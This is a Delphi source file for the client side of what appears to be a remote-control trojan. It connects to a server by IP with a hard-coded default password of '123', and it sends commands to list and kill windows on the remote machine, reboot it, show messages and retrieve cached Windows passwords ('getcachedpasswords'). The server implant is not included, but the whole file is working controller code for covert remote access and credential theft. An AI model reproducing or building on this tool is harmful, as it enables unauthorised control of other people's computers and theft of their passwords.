unit ClientUnit;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  StdCtrls, ScktComp, ComCtrls;

type
  TForm1 = class(TForm)
    Label1: TLabel;
    etIp: TEdit;
    bnConnect: TButton;
    bnDisconnect: TButton;
    Client: TClientSocket;
    StatusBar1: TStatusBar;
    bnGetInfo: TButton;
    Button1: TButton;
    lbInfo: TListBox;
    bnCloseWindow: TButton;
    bnSendMessage: TButton;
    bnReboot: TButton;
    bnPasswords: TButton;
    procedure bnConnectClick(Sender: TObject);
    procedure bnDisconnectClick(Sender: TObject);
    procedure ClientConnect(Sender: TObject; Socket: TCustomWinSocket);
    procedure ClientDisconnect(Sender: TObject; Socket: TCustomWinSocket);
    procedure ClientError(Sender: TObject; Socket: TCustomWinSocket;
      ErrorEvent: TErrorEvent; var ErrorCode: Integer);
    procedure ClientRead(Sender: TObject; Socket: TCustomWinSocket);
    procedure bnGetInfoClick(Sender: TObject);
    procedure Button1Click(Sender: TObject);
    procedure bnCloseWindowClick(Sender: TObject);
    procedure bnSendMessageClick(Sender: TObject);
    procedure bnRebootClick(Sender: TObject);
    procedure bnPasswordsClick(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

uses SendMessage;


{$R *.DFM}


// connect---------------------------------------------------
procedure TForm1.bnConnectClick(Sender: TObject);
begin
 Client.Address:=etIP.Text;
 Client.Open;
end;

// disconnect------------------------------------------------
procedure TForm1.bnDisconnectClick(Sender: TObject);
begin
 Client.Close;
end;


// if connect , then-------------------------------------------
procedure TForm1.ClientConnect(Sender: TObject; Socket: TCustomWinSocket);
var
password,str:string;


begin
StatusBar1.SimpleText:='Connected ...';

str:=InputBox('Password verification','Enter password','123');
password:='password%'+str;
Client.Socket.SendText(password);

end;



// if disconnect then ---------------------------------------
procedure TForm1.ClientDisconnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
StatusBar1.SimpleText:='Disconnected !!!';
end;


//on error---------------------------------------------------
procedure TForm1.ClientError(Sender: TObject; Socket: TCustomWinSocket;
  ErrorEvent: TErrorEvent; var ErrorCode: Integer);
begin
StatusBar1.SimpleText:='Error '+InttoStr(ErrorCode);
ErrorCode:=0;
end;




// read from server------------------------------------------
procedure TForm1.ClientRead(Sender: TObject; Socket: TCustomWinSocket);

var
str:string;

begin

str:=Client.Socket.ReceiveText;
lbInfo.Items.Add(str);

end;



// getinfo---------------------------------------------------
procedure TForm1.bnGetInfoClick(Sender: TObject);
begin
lbInfo.Items.Clear;
Client.Socket.SendText('info');
end;


// list------------------------------------------------------
procedure TForm1.Button1Click(Sender: TObject);
begin
lbInfo.Items.Clear;
Client.Socket.SendText('list');
end;

// close some window-----------------------------------------
procedure TForm1.bnCloseWindowClick(Sender: TObject);
var
i:integer;
str:string;

begin
 i:=lbInfo.ItemIndex;
 if i=-1 then
  begin
   ShowMessage('Choose window to close first!');
   Exit;
  end;
// ShowMessage(IntToStr(i)+lbInfo.Items[i]);
str:=lbInfo.Items[i];
Client.Socket.SendText('kill%'+str);

end;


// Send System Message----------------------------------------------------
procedure TForm1.bnSendMessageClick(Sender: TObject);
begin
FmSendMessage.Show;
end;

// Reboot-----------------------------------------------------------------
procedure TForm1.bnRebootClick(Sender: TObject);
begin
 Client.Socket.SendText('reboot');
end;



// cached passwords
procedure TForm1.bnPasswordsClick(Sender: TObject);
begin
 lbInfo.Items.Clear;
 Client.Socket.SendText('getcachedpasswords');//get names of pwl

end;

end.
